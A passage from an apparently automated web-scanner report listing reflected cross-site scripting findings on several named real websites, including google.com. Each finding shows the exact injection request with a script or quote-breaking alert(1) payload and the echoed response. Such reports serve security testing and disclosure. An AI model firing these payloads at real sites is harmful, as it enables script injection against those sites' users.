User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=aaedf1562ad27fe7dbffc58ae5c56f87; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: aaedf1562ad27fe7dbffc58ae5c56f87=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50588

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/On-Deckd5fe3'><script>alert(1)</script>2aec528306' />
...[SNIP]...

1.105. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/On-Deck

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2be"><script>alert(1)</script>0cc37f18b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/On-Deck9a2be"><script>alert(1)</script>0cc37f18b7a HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=2190b7470bec9191f7a3b7fb33cc4ced; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2190b7470bec9191f7a3b7fb33cc4ced=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50578

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/On-Deck9a2be"><script>alert(1)</script>0cc37f18b7a" />
...[SNIP]...

1.106. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/The-Noob

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a634"><script>alert(1)</script>ec3897212c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/The-Noob3a634"><script>alert(1)</script>ec3897212c8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=1cc6f27e893df95ce1bafcfc9a13f70c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1cc6f27e893df95ce1bafcfc9a13f70c=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50414

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/The-Noob3a634"><script>alert(1)</script>ec3897212c8" />
...[SNIP]...

1.107. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/The-Noob

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3d86'><script>alert(1)</script>b1ffded8566 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/The-Noobb3d86'><script>alert(1)</script>b1ffded8566 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=550a29db4533d9b4bb7330a8ad3d7e8f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 550a29db4533d9b4bb7330a8ad3d7e8f=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50416

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/The-Noobb3d86'><script>alert(1)</script>b1ffded8566' />
...[SNIP]...

1.108. http://www.butterscotch.com/shows/The-Noob [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/The-Noob

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 756bb"-alert(1)-"c84622db6bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/The-Noob756bb"-alert(1)-"c84622db6bd HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=f615d29a7e5ec5d4974871af0bcf1182; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f615d29a7e5ec5d4974871af0bcf1182=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50341

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/The-Noob756bb"-alert(1)-"c84622db6bd";

</script>
...[SNIP]...

1.109. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7c85'><script>alert(1)</script>bc9e9d0f84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tutorials.html?d7c85'><script>alert(1)</script>bc9e9d0f84=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=50028f24a02248e8a3ad46b9ac8bedf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 50028f24a02248e8a3ad46b9ac8bedf4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/tutorials.html?d7c85'><script>alert(1)</script>bc9e9d0f84=1' />
...[SNIP]...

1.110. http://www.butterscotch.com/tutorials.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c73a3"-alert(1)-"3ae1549e395 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tutorials.html?c73a3"-alert(1)-"3ae1549e395=1 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=5ed14ea161c202f343720ca7427c85a9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 5ed14ea161c202f343720ca7427c85a9=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56385

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'tut';
url = "http://www.butterscotch.com/tutorials.html?c73a3"-alert(1)-"3ae1549e395=1";

</script>
...[SNIP]...

1.111. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 59ab9</title><script>alert(1)</script>4e54375ce26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reviews/59ab9</title><script>alert(1)</script>4e54375ce26/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:49:44 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22%3FN%3D0%26D%3Dx%26Ntt%3Dreviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22%26top%3Dyes; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: bzid=1296769784292; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: JSESSIONID=C184320DF1036E3FFFE2C9F230AFB45D.furyportal; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27134

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<title>Buzzillions.com - Search for &#8220;reviews/59ab9</title><script>alert(1)</script>4e54375ce26/x22&#8221;</title>
...[SNIP]...

1.112. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c455e'%3balert(1)//fdc072ec141 was submitted in the REST URL parameter 2. This input was echoed as c455e';alert(1)//fdc072ec141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/c455e'%3balert(1)//fdc072ec141/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:49:42 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2Fc455e%27%3FN%3D0%26D%3Dx%26Ntt%3Dreviews%2Fc455e%27%3Balert%281%29%2F%2Ffdc072ec141%2Fx22%26top%3Dyes; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: bzid=1296769782702; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: JSESSIONID=3E5B3D0DD9811F0B99BA32EBCB8EA2F2.visionportal; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26564

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<script>bZ.events.handlers.zeroResults('reviews/c455e';alert(1)//fdc072ec141/x22');</script>
...[SNIP]...

1.113. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 610a7<script>alert(1)</script>e398f29f414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reviews/610a7<script>alert(1)</script>e398f29f414/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:49:43 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2F610a7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee398f29f414%2Fx22%3FN%3D0%26D%3Dx%26Ntt%3Dreviews%2F610a7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee398f29f414%2Fx22%26top%3Dyes; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: bzid=1296769783501; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: JSESSIONID=53936D12D95B3B989389E8D7395B2528.snowbird1portal; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26907

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<span style="color: #74B74A);" class="bz-emphasize">"reviews/610a7<script>alert(1)</script>e398f29f414/x22"</span>
...[SNIP]...

1.114. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5ccfe(a)d05f17aeea9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?5ccfe(a)d05f17aeea9=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:50:52 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?5ccfe(a)d05f17aeea9\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

1.115. http://www.ip-adress.com/whois/smartdevil.com/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ip-adress.com
Path:   /whois/smartdevil.com/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44a08'%3b28a34fbd60c was submitted in the REST URL parameter 2. This input was echoed as 44a08';28a34fbd60c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /whois/smartdevil.com44a08'%3b28a34fbd60c/x22 HTTP/1.1
Host: www.ip-adress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:56:51 GMT
Server: Apache
Cache-Control: no-cache
Expires: -1
Set-Cookie: isv=1; expires=Fri, 04-Feb-2011 21:56:51 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13811

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<span id="hostname">smartdevil.com44a08';28a34fbd60c </' + 'span>
...[SNIP]...

1.116. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e162b"%3b450ee9e1714 was submitted in the REST URL parameter 2. This input was echoed as e162b";450ee9e1714 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /find-jobs/All-Locatione162b"%3b450ee9e1714/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4385d0f17cf8fcee3ef445880de44c08=a7d5c6bff03ec5fc507b206bd2f58b86; path=/
Set-Cookie: ja_kyanite_ii_tpl=ja_kyanite_ii; expires=Tue, 24-Jan-2012 21:59:48 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 21:59:48 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...
<!--
indeed_jobroll_format = "160x600";
indeed_jobroll_publisher = "6387719032121626";
indeed_jobroll_keywords = "warehouse openings in westland michigan.html";
indeed_jobroll_location = "all locatione162b";450ee9e1714";
indeed_jobroll_country = "US";
indeed_jobroll_channel = "chanel1";
indeed_color_background = "FFFFFF";
indeed_color_border = "FFFFFF";
//-->
...[SNIP]...

1.117. http://www.jobsyndicates.com/find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.jobsyndicates.com
Path:   /find-jobs/All-Location/warehouse-openings-in-westland-michigan.html/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4473"%20a%3db%2016a87f4d9f1 was submitted in the REST URL parameter 2. This input was echoed as c4473" a=b 16a87f4d9f1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /find-jobs/All-Locationc4473"%20a%3db%2016a87f4d9f1/warehouse-openings-in-westland-michigan.html/x22 HTTP/1.1
Host: www.jobsyndicates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:46 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.3
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
